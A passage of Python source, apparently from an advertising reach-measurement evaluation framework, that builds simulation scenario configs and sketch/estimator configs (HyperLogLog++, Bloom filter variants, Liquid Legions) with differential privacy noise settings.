    num_sets: the number of sets.
    small_set_size: the reach of the small reach sets.
    large_set_size: the reach of the large reach sets.
    user_activity_assciation: one of the
      set_generator.USER_ACTIVITY_ASSOCIATION_XXX constants; INDEPENDENT
      gives scenario 3(a), IDENTICAL gives 3(b).

  Returns:
    A list of ScenarioConfigs of scenario 3(a/b) with selected parameters.
  """
  set_size_patterns = _get_default_name_to_choices_of_set_size_list(
      small_set_size, large_set_size, num_sets)
  configs = []
  for pattern_name, sizes in set_size_patterns.items():
    scenario_name = '-'.join([
        'exponential_bow',
        'user_activity_association:' + str(user_activity_assciation),
        'universe_size:' + str(universe_size),
        'small_set:' + str(small_set_size),
        'large_set:' + str(large_set_size),
        'set_type:' + pattern_name])
    factory = (
        set_generator.ExponentialBowSetGenerator
        .get_generator_factory_with_set_size_list(
            user_activity_association=user_activity_assciation,
            universe_size=universe_size,
            set_size_list=sizes))
    configs.append(
        ScenarioConfig(name=scenario_name, set_generator_factory=factory))
  return configs
def _generate_configs_scenario_4a(universe_size, num_sets, small_set_size,
                                  large_set_size):
  """Generate configs of Scenario 4(a).

  In this setting, all the sets are identical.

  See Scenario 4: Full overlap or disjoint for more details:
  https://github.com/world-federation-of-advertisers/cardinality_estimation_evaluation_framework/blob/master/doc/cardinality_and_frequency_estimation_evaluation_framework.md#scenario-4-full-overlap-or-disjoint

  Args:
    universe_size: the size of the pools from which the IDs will be selected.
    num_sets: the number of sets.
    small_set_size: the reach of the small reach sets.
    large_set_size: the reach of the large reach sets.

  Returns:
    A list of ScenarioConfigs of scenario 4(a) with either small or large
    reach.
  """
  def _overlap_config(set_size):
    # One fully-overlapped scenario per reach level.
    return ScenarioConfig(
        name='-'.join([
            'fully_overlapped',
            'universe_size:' + str(universe_size),
            'num_sets:' + str(num_sets),
            'set_sizes:' + str(set_size)
        ]),
        set_generator_factory=(
            set_generator.FullyOverlapSetGenerator
            .get_generator_factory_with_num_and_size(
                universe_size=universe_size,
                num_sets=num_sets,
                set_size=set_size)))

  return [_overlap_config(s) for s in (small_set_size, large_set_size)]
def _generate_configs_scenario_4b(universe_size, num_sets, small_set_size,
                                  large_set_size, order):
  """Generate configs of Scenario 4(b).

  In this scenario, sets are overlapped: each small set is a subset of a
  large set. Currently only a small set contained in a large set is
  supported; set_generator.py would need updating for more flexible sizes.

  See Scenario 4: Full overlap or disjoint for more details:
  https://github.com/world-federation-of-advertisers/cardinality_estimation_evaluation_framework/blob/master/doc/cardinality_and_frequency_estimation_evaluation_framework.md#scenario-4-full-overlap-or-disjoint

  Args:
    universe_size: the size of the pools from which the IDs will be selected.
    num_sets: the number of sets.
    small_set_size: the reach of the small reach sets.
    large_set_size: the reach of the large reach sets.
    order: the order of the sets. Should be one of set_generator.ORDER_XXX.

  Returns:
    A list of ScenarioConfigs of scenario 4(b) with subset sets.
  """
  def _subset_config(num_large_sets):
    num_small_sets = num_sets - num_large_sets
    return ScenarioConfig(
        name='-'.join([
            'subset',
            'universe_size:' + str(universe_size),
            'order:' + str(order),
            'num_large_sets:' + str(num_large_sets),
            'num_small_sets:' + str(num_small_sets),
            'large_set_size:' + str(large_set_size),
            'small_set_size:' + str(small_set_size),
        ]),
        set_generator_factory=(
            set_generator.SubSetGenerator
            .get_generator_factory_with_num_and_size(
                order=order,
                universe_size=universe_size,
                num_large_sets=num_large_sets,
                num_small_sets=num_small_sets,
                large_set_size=large_set_size,
                small_set_size=small_set_size)))

  # Sweep a minority, an even split, and a majority of large sets.
  return [_subset_config(k) for k in (1, int(num_sets / 2), num_sets - 1)]
def _generate_configs_scenario_5(num_sets, small_set_size,
                                 large_set_size, order, shared_prop_list):
  """Generate configs of Scenario 5.

  In this scenario, the sets are sequentially correlated.

  See Scenario 5: Sequentially correlated campaigns for more details:
  https://github.com/world-federation-of-advertisers/cardinality_estimation_evaluation_framework/blob/master/doc/cardinality_and_frequency_estimation_evaluation_framework.md#scenario-5-sequentially-correlated-campaigns

  Args:
    num_sets: the number of sets.
    small_set_size: the reach of the small reach sets.
    large_set_size: the reach of the large reach sets.
    order: the order of the sets. Should be one of set_generator.ORDER_XXX.
    shared_prop_list: a sequence of the shared proportion of sequentially
      correlated sets.

  Returns:
    A list of ScenarioConfigs of scenario 5 sequentially correlated sets.
  """
  half = int(num_sets / 2)
  set_size_patterns = _get_default_name_to_choices_of_set_size_list(
      small_set_size, large_set_size, num_sets)
  # Scenario 5 additionally sweeps large/small patterns that mirror the
  # defaults; update() appends them after the default keys.
  set_size_patterns.update({
      'large_then_last_small': [large_set_size] * (num_sets - 1) + [
          small_set_size],
      'all_large_except_middle_small': (
          [large_set_size] * half + [small_set_size]
          + [large_set_size] * (num_sets - 1 - half)),
      '1st_large_then_small': [large_set_size] + [small_set_size] * (
          num_sets - 1),
      'all_small_except_middle_large': (
          [small_set_size] * half + [large_set_size]
          + [small_set_size] * (num_sets - 1 - half)),
      '1st_half_large_2nd_half_small': (
          [large_set_size] * half
          + [small_set_size] * (num_sets - half)),
      'repeated_small_large': (
          [small_set_size, large_set_size] * half
          + ([] if num_sets % 2 == 0 else [small_set_size]))
  })
  correlation_choices = (set_generator.CORRELATED_SETS_ONE,
                         set_generator.CORRELATED_SETS_ALL)
  configs = []
  # product() iterates in the same order as the original nested loops:
  # correlated_sets outermost, set-size pattern innermost.
  for correlated_sets, shared_prop, (pattern, sizes) in itertools.product(
      correlation_choices, shared_prop_list, set_size_patterns.items()):
    configs.append(
        ScenarioConfig(
            name='-'.join([
                'sequentially_correlated',
                'order:' + str(order),
                'correlated_sets:' + str(correlated_sets),
                'shared_prop:' + str(shared_prop),
                'set_type:' + str(pattern),
                'large_set_size:' + str(large_set_size),
                'small_set_size:' + str(small_set_size)
            ]),
            set_generator_factory=(
                set_generator.SequentiallyCorrelatedSetGenerator.
                get_generator_factory_with_set_size_list(
                    order=order,
                    correlated_sets=correlated_sets,
                    shared_prop=shared_prop,
                    set_size_list=sizes)))
    )
  return configs
def _generate_freq_configs_scenario_1(universe_size, num_sets, set_size):
  """Generate configs of Frequency Scenario 1.

  See Frequency Scenario 1: Homogeneous user activities within a publisher:
  https://github.com/world-federation-of-advertisers/cardinality_estimation_evaluation_framework/blob/master/doc/cardinality_and_frequency_estimation_evaluation_framework.md#frequency-scenario-1-homogeneous-user-activities-within-a-publisher-1

  Args:
    universe_size: the universal size of reach.
    num_sets: the number of sets.
    set_size: size of each set, assuming they're all equal.

  Returns:
    A list of ScenarioConfigs sweeping frequency rate and frequency cap.
  """
  configs = []
  for rate, cap in itertools.product([0.5, 1, 1.5, 2], [3, 5, 10]):
    scenario_name = '-'.join([
        'homogeneous',
        'universe_size:' + str(universe_size),
        'num_sets:' + str(num_sets),
        'freq_rate:' + str(rate),
        'freq_cap:' + str(cap),
    ])
    configs.append(
        ScenarioConfig(
            name=scenario_name,
            set_generator_factory=(
                frequency_set_generator.HomogeneousMultiSetGenerator.
                get_generator_factory_with_num_and_size(
                    universe_size=universe_size, num_sets=num_sets,
                    set_size=set_size, freq_rates=[rate] * num_sets,
                    freq_cap=cap))))
  return configs
def _generate_freq_configs_scenario_2(universe_size, num_sets, set_size):
  """Generate configs of Frequency Scenario 2.

  See Frequency Scenario 2: Heterogeneous user frequency:
  https://github.com/world-federation-of-advertisers/cardinality_estimation_evaluation_framework/blob/master/doc/cardinality_and_frequency_estimation_evaluation_framework.md#frequency-scenario-2-heterogeneous-user-frequency-1

  Args:
    universe_size: the universal size of reach.
    num_sets: the number of sets.
    set_size: size of each set, assuming they're all equal.

  Returns:
    A list of ScenarioConfigs sweeping gamma distribution rate and frequency
    cap.
  """
  configs = []
  for rate, cap in itertools.product([0.5, 1, 1.5, 2], [3, 5, 10]):
    scenario_name = '-'.join([
        'heterogeneous',
        'universe_size:' + str(universe_size),
        'num_sets:' + str(num_sets),
        'distribution_rate:' + str(rate),
        'freq_cap:' + str(cap),
    ])
    configs.append(
        ScenarioConfig(
            name=scenario_name,
            set_generator_factory=(
                frequency_set_generator.HeterogeneousMultiSetGenerator.
                get_generator_factory_with_num_and_size(
                    universe_size=universe_size, num_sets=num_sets,
                    set_size=set_size,
                    gamma_params=[[1,rate]]*num_sets,
                    freq_cap=cap))))
  return configs
def _generate_freq_configs_scenario_3(universe_size, num_sets, set_size):
  """Generate configs of Frequency Scenario 3.

  This is a stress testing, in which each publisher serves a fixed number of
  impressions to every reached id.

  See Frequency Scenario 3: Per-publisher frequency capping:
  https://github.com/world-federation-of-advertisers/cardinality_estimation_evaluation_framework/blob/master/doc/cardinality_and_frequency_estimation_evaluation_framework.md#frequency-scenario-3-per-publisher-frequency-capping

  Args:
    universe_size: the universal size of reach.
    num_sets: the number of sets.
    set_size: size of each set, assuming they're all equal.

  Returns:
    A list of ScenarioConfigs, one per fixed per-publisher frequency.
  """
  return [
      ScenarioConfig(
          name='-'.join([
              'publisher_constant_frequency',
              'universe_size:' + str(universe_size),
              'num_sets:' + str(num_sets),
              'frequency:' + str(frequency),
          ]),
          set_generator_factory=(
              frequency_set_generator.PublisherConstantFrequencySetGenerator
              .get_generator_factory_with_num_and_size(
                  universe_size=universe_size,
                  num_sets=num_sets,
                  set_size=set_size,
                  frequency=frequency)))
      for frequency in (2, 3, 5, 10)
  ]
def _complete_frequency_test_with_selected_parameters(
    num_runs=NUM_RUNS_VALUE,
    universe_size=FREQ_UNIVERSE_SIZE,
    num_sets=NUM_SETS_VALUE_FREQ,
    set_size=SET_SIZE_FOR_FREQ):
  """Generate configurations with handy selected parameters for scenarios.

  This evaluation covers the frequency simulation scenarios.

  Args:
    num_runs: the number of runs per scenario * parameter setting.
    universe_size: the size of the pools from which the IDs will be selected.
    num_sets: the number of sets.
    set_size: reached size of each publisher, assuming all publishers have the
      same size.

  Returns:
    An EvaluationConfig.
  """
  scenario_generators = (
      _generate_freq_configs_scenario_1,  # Homogeneous user activities.
      _generate_freq_configs_scenario_2,  # Heterogeneous user frequency.
      _generate_freq_configs_scenario_3,  # Per-publisher frequency capping.
  )
  scenario_config_list = []
  for generate in scenario_generators:
    scenario_config_list.extend(generate(universe_size, num_sets, set_size))
  return EvaluationConfig(
      name='complete_frequency_test_with_selected_parameters',
      num_runs=num_runs,
      scenario_config_list=scenario_config_list)
def _complete_test_with_selected_parameters(
    num_runs=NUM_RUNS_VALUE,
    universe_size=UNIVERSE_SIZE_VALUE,
    num_sets=NUM_SETS_VALUE,
    order=set_generator.ORDER_RANDOM,
    small_set_size_rate=SMALL_REACH_RATE_VALUE,
    large_set_size_rate=LARGE_REACH_RATE_VALUE,
    remarketing_rate=REMARKETING_RATE_VALUE,
    shared_prop_list=SHARED_PROP_LIST_VALUE):
  """Generate configurations with handy selected parameters for scenarios.

  This evaluation covers the reach simulation scenarios.

  Args:
    num_runs: the number of runs per scenario * parameter setting.
    universe_size: the size of the pools from which the IDs will be selected.
    num_sets: the number of sets.
    order: the order of the sets. Should be one of set_generator.ORDER_XXX.
    small_set_size_rate: the reach percentage of the small reach sets.
    large_set_size_rate: the reach percentage of the large reach sets.
    remarketing_rate: the remarketing list size as a fraction of
      universe_size, used by scenario 2.
    shared_prop_list: a sequence of the shared proportion of sequentially
      correlated sets.

  Returns:
    An EvaluationConfig.
  """
  scenario_config_list = []
  small_set_size = int(small_set_size_rate * universe_size)
  large_set_size = int(large_set_size_rate * universe_size)
  # Scenario 1. Independent publishers
  scenario_config_list += _generate_configs_scenario_1_2(
      universe_size, num_sets, small_set_size, large_set_size)
  # Scenario 2. publishers independently serve a remarketing list
  scenario_config_list += _generate_configs_scenario_1_2(
      universe_size, num_sets, small_set_size, large_set_size, remarketing_rate)
  # Scenario 3 (a). Exponential bow, independent user behavior.
  scenario_config_list += _generate_configs_scenario_3(
      universe_size, num_sets, small_set_size, large_set_size,
      set_generator.USER_ACTIVITY_ASSOCIATION_INDEPENDENT)
  # Scenario 3 (b). Exponential bow, identical user behavior.
  scenario_config_list += _generate_configs_scenario_3(
      universe_size, num_sets, small_set_size, large_set_size,
      set_generator.USER_ACTIVITY_ASSOCIATION_IDENTICAL)
  # Scenario 4(a). Fully-overlapped.
  scenario_config_list += _generate_configs_scenario_4a(
      universe_size, num_sets, small_set_size, large_set_size)
  # Scenario 4(b). Subset campaigns.
  scenario_config_list += _generate_configs_scenario_4b(
      universe_size, num_sets, small_set_size, large_set_size, order)
  # Scenario 5. Sequentially correlated campaigns
  scenario_config_list += _generate_configs_scenario_5(
      num_sets, small_set_size, large_set_size, order,
      shared_prop_list)
  return EvaluationConfig(
      name='complete_test_with_selected_parameters',
      num_runs=num_runs,
      scenario_config_list=scenario_config_list)
def _stress_test_cardinality_global_dp(universe_size=None,
                                       num_runs=NUM_RUNS_VALUE):
  """Stress test for cardinality estimator under global DP.

  Args:
    universe_size: unused; accepted only to conform to the run_evaluation
      module's interface.
    num_runs: the number of runs per scenario.

  Returns:
    An EvaluationConfig with one disjoint-set scenario per stress-test reach.
  """
  del universe_size  # Unused; see docstring.
  scenario_configs = [
      ScenarioConfig(
          name=f'{scenario_id}-reach:{reach}',
          set_generator_factory=(
              set_generator.DisjointSetGenerator
              .get_generator_factory_with_set_size_list(
                  set_sizes=[reach])))
      for scenario_id, reach in enumerate(sorted(REACH_STRESS_TEST))
  ]
  return EvaluationConfig(
      name='global_dp_stress_test',
      num_runs=num_runs,
      scenario_config_list=scenario_configs)
def _frequency_end_to_end_test(universe_size=10000, num_runs=NUM_RUNS_VALUE):
  """EvaluationConfig of end-to-end test of frequency evaluation code."""
  num_sets = 3
  set_size = int(universe_size * REACH_RATE_FREQ_END_TO_END_TEST)
  scenario = ScenarioConfig(
      name='-'.join([
          'subset',
          'universe_size:' + str(universe_size),
          'num_sets:' + str(num_sets)
      ]),
      set_generator_factory=(
          frequency_set_generator.HomogeneousMultiSetGenerator
          .get_generator_factory_with_num_and_size(
              universe_size=universe_size,
              num_sets=num_sets,
              set_size=set_size,
              freq_rates=[1, 2, 3],
              freq_cap=5)))
  return EvaluationConfig(
      name='frequency_end_to_end_test',
      num_runs=num_runs,
      scenario_config_list=[scenario])
def _generate_evaluation_configs():
  """Returns the tuple of all evaluation-config factory callables.

  get_evaluation_config() looks a config up by the name attribute of the
  EvaluationConfig each factory constructs.
  """
  return (
      _smoke_test,
      _complete_test_with_selected_parameters,
      _stress_test_cardinality_global_dp,
      _frequency_end_to_end_test,
      _frequency_smoke_test,
      _complete_frequency_test_with_selected_parameters,
  )
def get_evaluation_config(config_name):
  """Returns the evaluation config with the specified config_name.

  Args:
    config_name: the name of the EvaluationConfig constructed by one of the
      registered config factories.

  Returns:
    The factory callable whose EvaluationConfig has name == config_name.

  Raises:
    ValueError: if two registered configs share a name, or if config_name
      does not match any registered config.
  """
  configs = _generate_evaluation_configs()
  # Construct each config exactly once; the previous implementation rebuilt
  # every config several times (name listing, O(n^2) duplicate scan, and a
  # second full pass to locate the match).
  name_to_config = {}
  duplicate_configs = []
  for config in configs:
    name = config().name
    if name in name_to_config:
      duplicate_configs.append(name)
    else:
      name_to_config[name] = config
  if duplicate_configs:
    raise ValueError("Duplicate names found in evaluation configs: {}".
                     format(','.join(duplicate_configs)))
  if config_name not in name_to_config:
    raise ValueError("Invalid evaluation config: {}\n"
                     "Valid choices are as follows: {}".format(
                         config_name, ','.join(name_to_config)))
  return name_to_config[config_name]
def _format_epsilon(dp_type, epsilon=None, decimals=EPSILON_DECIMALS):
  """Format epsilon value to string.

  Args:
    dp_type: one of LOCAL_DP_STR and GLOBAL_DP_STR.
    epsilon: an optional differential private parameter. By default set to None.
    decimals: an integer value which set the number of decimal points of the
      epsilon to keep. By default, set to EPSILON_DECIMALS.

  Returns:
    A string representation of epsilon.

  Raises:
    ValueError: if dp_type is not one of 'local' and 'global'.
  """
  if epsilon is not None:
    # E.g. 'global_dp_1.0986' with the default four decimals.
    return f'{dp_type}_{float(epsilon):0.{decimals}f}'
  if dp_type == GLOBAL_DP_STR:
    return NO_GLOBAL_DP_STR
  if dp_type == LOCAL_DP_STR:
    return NO_LOCAL_DP_STR
  raise ValueError(f'dp_type should be one of "{GLOBAL_DP_STR}" and '
                   f'"{LOCAL_DP_STR}".')
def _format_privacy_parameters(dp_type, epsilon=None, delta=None, num_queries=1,
                               noise_type=None,
                               epsilon_decimals=EPSILON_DECIMALS,
                               delta_decimals=DELTA_DECIMALS):
  """Format privacy parameters to string.

  Args:
    dp_type: one of LOCAL_DP_STR and GLOBAL_DP_STR.
    epsilon: an optional differential private parameter. By default set to None.
    delta: an optional differential private parameter. By default set to None.
      When delta is set, epsilon must also be set.
    num_queries: the number of queries over which the privacy budget is split.
    noise_type: the type of noise added. When set, must be one of
      GEOMETRIC_NOISE or GAUSSIAN_NOISE.
    epsilon_decimals: an integer value which set the number of decimal points
      of the epsilon to keep. By default, set to EPSILON_DECIMALS.
    delta_decimals: an integer value which set the number of decimal points of
      the delta to keep. By default, set to DELTA_DECIMALS.

  Returns:
    A string representation of the given privacy parameters.

  Raises:
    ValueError: if dp_type is not one of 'local' and 'global', or if delta is
      set without epsilon being set.
  """
  if epsilon is None:
    if delta is not None:
      raise ValueError(f'Delta cannot be set with epsilon unset: {delta}.')
    if dp_type == GLOBAL_DP_STR:
      return NO_GLOBAL_DP_STR
    if dp_type == LOCAL_DP_STR:
      return NO_LOCAL_DP_STR
    raise ValueError(f'dp_type should be one of "{GLOBAL_DP_STR}" and '
                     f'"{LOCAL_DP_STR}".')
  eps_part = f'{epsilon:.{epsilon_decimals}f}'
  # A missing delta is formatted as zero.
  delta_part = f'{delta if delta is not None else 0:.{delta_decimals}f}'
  noise_part = f'-{noise_type}' if noise_type else ''
  split_part = f'-budget_split-{num_queries}' if num_queries else ''
  return f'{dp_type}_{eps_part},{delta_part}{noise_part}{split_part}'
def construct_sketch_estimator_config_name(sketch_name, sketch_config,
                                           estimator_name, sketch_epsilon=None,
                                           estimate_epsilon=None,
                                           estimate_delta=None,
                                           num_estimate_queries=None,
                                           noise_type=None,
                                           max_frequency=None,
                                           epsilon_decimals=EPSILON_DECIMALS,
                                           delta_decimals=DELTA_DECIMALS):
  """Construct the name attribute for SketchEstimatorConfig.

  The name will be in the format of
  name_of_sketch-param_of_sketch-estimator_specification-sketch_epsilon
  -estimate_epsilon[-max_frequency].

  Args:
    sketch_name: a string of the estimator name. Do not include dash (-).
    sketch_config: a string of the sketch config. Do not include dash (-).
    estimator_name: a string of the estimator name. Do not include dash (-).
    sketch_epsilon: an optional differential private parameter for the sketch.
      By default, set to None, i.e., not add noise to the sketch.
    estimate_epsilon: an optional differential private parameter for the
      estimate. By default, set to None, i.e., not add noise to the estimate.
    estimate_delta: an optional differential private parameter for the
      estimate. By default, set to None.
    num_estimate_queries: the number of queries over which the privacy budget
      for the estimate is split.
    noise_type: the type of noise added to each estimate. When set, must be one
      of GEOMETRIC_NOISE or GAUSSIAN_NOISE.
    max_frequency: an optional maximum frequency level. If not given, will not
      be added to the name.
    epsilon_decimals: an integer value which set the number of decimal points
      of the epsilon to keep. By default, set to EPSILON_DECIMALS.
    delta_decimals: an integer value which set the number of decimal points of
      the delta to keep. By default, set to DELTA_DECIMALS.

  Returns:
    The name of the SketchEstimatorConfig.

  Raises:
    AssertionError: if the input include dash (-).
  """
  for part in (sketch_name, sketch_config, estimator_name):
    assert '-' not in part, f'Input should not contain "-", given {part}.'
  local_dp_part = _format_epsilon(
      LOCAL_DP_STR, epsilon=sketch_epsilon, decimals=epsilon_decimals)
  if num_estimate_queries is None:
    # Simple epsilon-only formatting when the budget is not split.
    global_dp_part = _format_epsilon(
        GLOBAL_DP_STR, epsilon=estimate_epsilon, decimals=epsilon_decimals)
  else:
    global_dp_part = _format_privacy_parameters(
        GLOBAL_DP_STR, epsilon=estimate_epsilon, delta=estimate_delta,
        num_queries=num_estimate_queries, noise_type=noise_type,
        epsilon_decimals=epsilon_decimals, delta_decimals=delta_decimals)
  name_parts = [sketch_name, sketch_config, estimator_name, local_dp_part,
                global_dp_part]
  if max_frequency is not None:
    name_parts.append(str(max_frequency))
  return '-'.join(name_parts)
# Document the estimators.
def _independent_set_estimator(sketch_epsilon=None, estimate_epsilon=None):
  """Generate a SketchEstimatorConfig for the independent set estimator.

  The underlying sketch is a single-bucket Vector-of-Counts ("reach" sketch)
  and the universe size is fixed to UNIVERSE_SIZE_VALUE.

  Args:
    sketch_epsilon: a differential private parameter for the sketch.
    estimate_epsilon: a differential private parameter for the estimated
      cardinality.

  Returns:
    A SketchEstimatorConfig for the independent estimator.
  """
  # A falsy epsilon disables the corresponding (local or global) noiser.
  sketch_noiser = (
      vector_of_counts.LaplaceNoiser(epsilon=sketch_epsilon)
      if sketch_epsilon else None)
  estimate_noiser = (
      estimator_noisers.LaplaceEstimateNoiser(epsilon=estimate_epsilon)
      if estimate_epsilon else None)
  config_name = construct_sketch_estimator_config_name(
      sketch_name='reach_using_voc',
      sketch_config='1',
      estimator_name=f'independent_estimator_universe{UNIVERSE_SIZE_VALUE}',
      sketch_epsilon=sketch_epsilon,
      estimate_epsilon=estimate_epsilon)
  return SketchEstimatorConfig(
      name=config_name,
      sketch_factory=vector_of_counts.VectorOfCounts.get_sketch_factory(
          num_buckets=1),
      estimator=independent_set_estimator.IndependentSetEstimator(
          vector_of_counts.SequentialEstimator(), UNIVERSE_SIZE_VALUE),
      sketch_noiser=sketch_noiser,
      estimate_noiser=estimate_noiser)
def _hll_plus():
  """Generate a SketchEstimatorConfig for HyperLogLogPlus.

  The sketch has 2**14 registers and uses the standard HLL++ cardinality
  estimator. No differential privacy noise is applied.

  Returns:
    A SketchEstimatorConfig for HyperLogLogPlus.
  """
  # 2**14 buckets; also recorded in the config name below.
  sketch_len = 2**14
  return SketchEstimatorConfig(
      name=construct_sketch_estimator_config_name(
          sketch_name='hyper_log_log_plus',
          sketch_config=str(sketch_len),
          estimator_name='hll_cardinality'),
      sketch_factory=hyper_log_log.HyperLogLogPlusPlus.get_sketch_factory(
          length=sketch_len),
      estimator=hyper_log_log.HllCardinality(),
  )
def _log_bloom_filter_first_moment_log(length, sketch_epsilon=None,
                                       estimate_epsilon=None):
  """Generate a SketchEstimatorConfig for Logarithmic Bloom Filters.

  Args:
    length: the length of the log bloom filters.
    sketch_epsilon: a differential private parameter for the sketch.
    estimate_epsilon: a differential private parameter for the estimated
      cardinality.

  Returns:
    A SketchEstimatorConfig for log Bloom Filters of the given length.
  """
  # Local-DP noiser/denoiser pair: the sketch is blipped and the estimator
  # later denoises with the same epsilon.
  sketch_noiser = None
  sketch_denoiser = None
  if sketch_epsilon:
    sketch_noiser = bloom_filters.BlipNoiser(epsilon=sketch_epsilon)
    sketch_denoiser = bloom_filters.SurrealDenoiser(epsilon=sketch_epsilon)
  estimate_noiser = (
      estimator_noisers.GeometricEstimateNoiser(epsilon=estimate_epsilon)
      if estimate_epsilon else None)
  config_name = construct_sketch_estimator_config_name(
      sketch_name='log_bloom_filter',
      sketch_config=str(length),
      estimator_name='first_moment_log',
      sketch_epsilon=sketch_epsilon,
      estimate_epsilon=estimate_epsilon)
  return SketchEstimatorConfig(
      name=config_name,
      sketch_factory=bloom_filters.LogarithmicBloomFilter.get_sketch_factory(
          length=length),
      estimator=bloom_filters.FirstMomentEstimator(
          method=bloom_filters.FirstMomentEstimator.METHOD_LOG,
          noiser=estimate_noiser,
          denoiser=sketch_denoiser),
      sketch_noiser=sketch_noiser)
def _geo_bloom_filter_first_moment_geo(length,
                                       sketch_epsilon=None,
                                       estimate_epsilon=None):
  """Generate a SketchEstimatorConfig for Geometric Bloom Filters.

  The geometric distribution probability is derived from the sketch length so
  that length * probability == GEO_LENGTH_PROB_PRODUCT.

  Args:
    length: the length of the geometric bloom filters.
    sketch_epsilon: a differential private parameter for the sketch.
    estimate_epsilon: a differential private parameter for the estimated
      cardinality.

  Returns:
    A SketchEstimatorConfig for Geometric Bloom Filters of the given length.
  """
  if sketch_epsilon:
    sketch_noiser = bloom_filters.BlipNoiser(epsilon=sketch_epsilon)
    sketch_denoiser = bloom_filters.SurrealDenoiser(epsilon=sketch_epsilon)
  else:
    sketch_noiser, sketch_denoiser = None, None
  if estimate_epsilon:
    estimate_noiser = estimator_noisers.GeometricEstimateNoiser(
        epsilon=estimate_epsilon)
  else:
    estimate_noiser = None
  # Keep length * probability constant so sketches of different lengths are
  # comparable; the probability is recorded in the config name.
  probability = GEO_LENGTH_PROB_PRODUCT / length
  return SketchEstimatorConfig(
      name=construct_sketch_estimator_config_name(
          sketch_name='geo_bloom_filter',
          sketch_config=f'{length}_{probability:.6f}',
          estimator_name='first_moment_geo',
          sketch_epsilon=sketch_epsilon,
          estimate_epsilon=estimate_epsilon),
      sketch_factory=bloom_filters.GeometricBloomFilter.get_sketch_factory(
          length, probability),
      estimator=bloom_filters.FirstMomentEstimator(
          method=bloom_filters.FirstMomentEstimator.METHOD_GEO,
          noiser=estimate_noiser,
          denoiser=sketch_denoiser),
      sketch_noiser=sketch_noiser
  )
def _bloom_filter_first_moment_estimator_uniform(length, sketch_epsilon=None,
                                                 estimate_epsilon=None):
  """Generate a SketchEstimatorConfig for uniform Bloom Filters.

  The bloom filter uses a single hash function.

  Args:
    length: the length of the bloom filter.
    sketch_epsilon: a differential private parameter for the sketch.
    estimate_epsilon: a differential private parameter for the estimated
      cardinality.

  Returns:
    A SketchEstimatorConfig for Bloom Filters with 1 hash function.
  """
  # Local-DP noiser/denoiser pair is only set when a sketch epsilon is given.
  sketch_noiser = None
  sketch_denoiser = None
  if sketch_epsilon:
    sketch_noiser = bloom_filters.BlipNoiser(epsilon=sketch_epsilon)
    sketch_denoiser = bloom_filters.SurrealDenoiser(epsilon=sketch_epsilon)
  estimate_noiser = (
      estimator_noisers.GeometricEstimateNoiser(epsilon=estimate_epsilon)
      if estimate_epsilon else None)
  config_name = construct_sketch_estimator_config_name(
      sketch_name='bloom_filter',
      sketch_config=f'{length}_hash1',
      estimator_name='union_estimator',
      sketch_epsilon=sketch_epsilon,
      estimate_epsilon=estimate_epsilon)
  return SketchEstimatorConfig(
      name=config_name,
      sketch_factory=bloom_filters.UniformBloomFilter.get_sketch_factory(
          length),
      estimator=bloom_filters.FirstMomentEstimator(
          method=bloom_filters.FirstMomentEstimator.METHOD_UNIFORM,
          noiser=estimate_noiser,
          denoiser=sketch_denoiser),
      sketch_noiser=sketch_noiser)
def _exp_bloom_filter_first_moment_exp(length, sketch_epsilon=None,
                                       estimate_epsilon=None,
                                       estimate_delta=None,
                                       num_estimate_queries=None,
                                       noise_type=GEOMETRIC_NOISE,
                                       epsilon_decimals=EPSILON_DECIMALS):
  """Generate a SketchEstimatorConfig for Exponential Bloom Filters.

  The decay rate is 10 (EXP_ADBF_DECAY_RATE).

  Args:
    length: the length of the exponential bloom filters.
    sketch_epsilon: a differential private parameter for the sketch.
    estimate_epsilon: a differential private parameter for the estimated
      cardinality.
    estimate_delta: an optional differential private parameter for the
      estimate.
    num_estimate_queries: the number of queries over which the privacy budget
      for the estimate is split.
    noise_type: the type of noise added to each estimate. When noise is added,
      must be one of GEOMETRIC_NOISE, GAUSSIAN_NOISE or None.
    epsilon_decimals: an integer value which set the number of decimal
      points of the global epsilon to keep. By default, set to
      EPSILON_DECIMALS.

  Returns:
    A SketchEstimatorConfig for Exponential Bloom Filters of with decay rate
    being 10.

  Raises:
    ValueError: if estimate_epsilon is not None and noise_type is not one of
      GEOMETRIC_NOISE or GAUSSIAN_NOISE.
  """
  # Local (per-sketch) DP: blip the sketch and give the estimator a matching
  # denoiser.
  if sketch_epsilon:
    sketch_noiser = bloom_filters.BlipNoiser(epsilon=sketch_epsilon)
    sketch_denoiser = bloom_filters.SurrealDenoiser(epsilon=sketch_epsilon)
  else:
    sketch_noiser, sketch_denoiser = None, None
  # Global (per-estimate) DP. For geometric noise the budget is split evenly
  # across queries here; the Gaussian noiser receives num_queries and handles
  # the split itself.
  if estimate_epsilon:
    if noise_type == GEOMETRIC_NOISE:
      if num_estimate_queries:
        estimate_epsilon_per_query = estimate_epsilon / num_estimate_queries
      else:
        estimate_epsilon_per_query = estimate_epsilon
      estimate_noiser = estimator_noisers.GeometricEstimateNoiser(
          estimate_epsilon_per_query)
    elif noise_type == GAUSSIAN_NOISE:
      estimate_noiser = estimator_noisers.GaussianEstimateNoiser(
          estimate_epsilon, estimate_delta, num_queries=num_estimate_queries)
    else:
      raise ValueError(f'noise_type should be one of "{GEOMETRIC_NOISE}" and '
                       f'"{GAUSSIAN_NOISE}".')
  else:
    estimate_noiser = None
  return SketchEstimatorConfig(
      name=construct_sketch_estimator_config_name(
          sketch_name='exp_bloom_filter',
          sketch_config=str(length) + '_10',
          estimator_name='first_moment_exp',
          sketch_epsilon=sketch_epsilon,
          estimate_epsilon=estimate_epsilon,
          estimate_delta=estimate_delta,
          num_estimate_queries=num_estimate_queries,
          noise_type=noise_type,
          epsilon_decimals=epsilon_decimals),
      sketch_factory=bloom_filters.ExponentialBloomFilter.get_sketch_factory(
          length=length, decay_rate=EXP_ADBF_DECAY_RATE),
      estimator=bloom_filters.FirstMomentEstimator(
          method=bloom_filters.FirstMomentEstimator.METHOD_EXP,
          noiser=estimate_noiser,
          denoiser=sketch_denoiser),
      sketch_noiser=sketch_noiser
  )
# Baseline Liquid Legions configs with a=10, m=10**5.
# The "ln3" variant applies local blip noise with flip probability 0.25
# (per the name, presumably corresponding to epsilon = ln(3)); the "infty"
# variant is noiseless.
LIQUID_LEGIONS_1E5_10_LN3_SEQUENTIAL = SketchEstimatorConfig(
    name='liquid_legions-1e5_10-ln3-sequential',
    sketch_factory=liquid_legions.LiquidLegions.get_sketch_factory(
        a=10, m=10**5),
    estimator=liquid_legions.SequentialEstimator(),
    sketch_noiser=liquid_legions.Noiser(flip_probability=0.25))
